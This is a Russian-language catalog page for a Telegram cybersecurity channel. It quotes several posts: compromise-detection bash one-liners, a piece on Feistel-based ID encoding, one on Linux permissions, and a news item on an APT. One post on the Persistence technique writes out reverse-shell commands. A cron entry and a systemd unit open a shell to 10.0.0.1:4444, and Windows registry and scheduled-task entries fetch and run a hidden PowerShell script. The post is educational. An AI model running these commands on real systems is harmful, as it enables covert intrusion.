
- Главная
- Каталог
- Интернет технологии
- ZeroDay | Кибербезопасность
ZeroDay | Кибербезопасность
Учебник по информационной безопасности/кибербезопасности.
Новый свежезалитый канал со взрослой аудиторией
Статистика канала
Приветствую в мире цифровой безопасности!
Расскажу о 5 однострочниках, которые помогают быстро найти что-то нехорошее на хосте.
find / -xdev -perm -4000 -newer /var/log/auth.log 2>/dev/null{}
Новый setuid-бинарь вне стандартных путей - почти всегда что-то не то.
cat /proc/net/tcp6 /proc/net/tcp | awk 'NR>1 && $4=="0A" {print $2}' | while read addr; do port=$((16#${addr##*:})); echo $port; done | sort -u{}
Сравниваем с выводом ss -tlnp. Расхождение - признак руткита.
for pid in /proc/[0-9]*/fd; do ls -la $pid 2>/dev/null | grep socket | awk -v p=${pid%/fd} '{print p}'; done | sort -u | xargs -I{} cat {}/cmdline 2>/dev/null | tr '\0' ' ' | sort -u{}
echo $PATH | tr ':' '\n' | xargs -I{} find {} -maxdepth 1 -newer /proc/1/exe -type f 2>/dev/null{}
Изменённый бинарь в /usr/bin или /bin после инцидента - классическая замена системных утилит.
find /tmp /var/tmp /dev/shm -name ".*" -type d 2>/dev/null
ls -la /tmp /var/tmp /dev/shm | grep "^\."{}
/dev/shm особенно популярен у малвари, там файлы живут только в памяти и не пишутся на диск.
ZeroDay | Белый Хакер | #bashПриветствую в мире цифровой безопасности!
Расскажу об одной из самых страшных утечек из-за её последствий.
Приветствую в мире цифровой безопасности!
Сегодня расскажу о технике атаки Persistence.
(crontab -l 2>/dev/null; echo "*/5 * * * * bash -i >& /dev/tcp/10.0.0.1/4444 0>&1") | crontab -{}
Каждые пять минут жертва сама звонит атакующему.
cat > /etc/systemd/system/update.service <<EOF
[Unit]
Description=System Update Service
[Service]
ExecStart=/bin/bash -c 'bash -i >& /dev/tcp/10.0.0.1/4444 0>&1'
Restart=always
[Install]
WantedBy=multi-user.target
EOF
systemctl enable update.service{}
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v Updater /t REG_SZ /d "powershell -w hidden -c IEX(New-Object Net.WebClient).DownloadString('http://10.0.0.1/shell.ps1')"{}
schtasks /create /tn "WindowsUpdate" /tr "powershell -w hidden -ep bypass -f C:\temp\shell.ps1" /sc onlogon /ru System{}
Приветствую в мире цифровой безопасности!
В прошлый раз разобрали как сеть Фейстеля превращает последовательные ID в неугадываемые. А сегодня расскажу про ограничения и когда это не подходит.
export FEISTEL_KEY=$(openssl rand -hex 32){}
В репозиторий не класть никогда, при подозрении на компрометацию - ротация.
for i in range(1, 6):
print(f"{i} -> {feistel_encode(key, i)}")
# 1 -> 5823901847263
# 2 -> 9174625038192
# 3 -> 2847193650471{}
ZeroDay | Белый Хакер | #Инструментls -l и быстро понимать строки вроде drwxr-xr-x, как связаны символьная и восьмеричная нотации (rwx и 755) и почему права для файлов и директорий ведут себя по-разному. Показано, где базовой модели не хватает и подключается POSIX ACL, а также разобраны модели доступа: DAC, MAC через SELinux, RBAC и ABAC, и как они комбинируются в реальных системах.
ZeroDay | Белый Хакер | #СтатьяПриветствую в мире цифровой безопасности!
ESET нашли новую китайскую APT, которая прячет управление прямо внутри Discord и Slack. Разбираемся.
file.io.
Отзывы канала
всего 31 отзыв
- Добавлен: Сначала новые
- Добавлен: Сначала старые
- Оценка: По убыванию
- Оценка: По возрастанию
Каталог Телеграм-каналов для нативных размещений
ZeroDay | Кибербезопасность — это Telegam канал в категории «Интернет технологии», который предлагает эффективные форматы для размещения рекламных постов в Телеграмме. Количество подписчиков канала в 43.0K и качественный контент помогают брендам привлекать внимание аудитории и увеличивать охват. Рейтинг канала составляет 59.7, количество отзывов – 31, со средней оценкой 4.9.
Вы можете запустить рекламную кампанию через сервис Telega.in, выбрав удобный формат размещения. Платформа обеспечивает прозрачные условия сотрудничества и предоставляет детальную аналитику. Стоимость размещения составляет 13986.0 ₽, а за 120 выполненных заявок канал зарекомендовал себя как надежный партнер для рекламы в TG. Размещайте интеграции уже сегодня и привлекайте новых клиентов вместе с Telega.in!
Вы снова сможете добавить каналы в корзину из каталога
Комментарий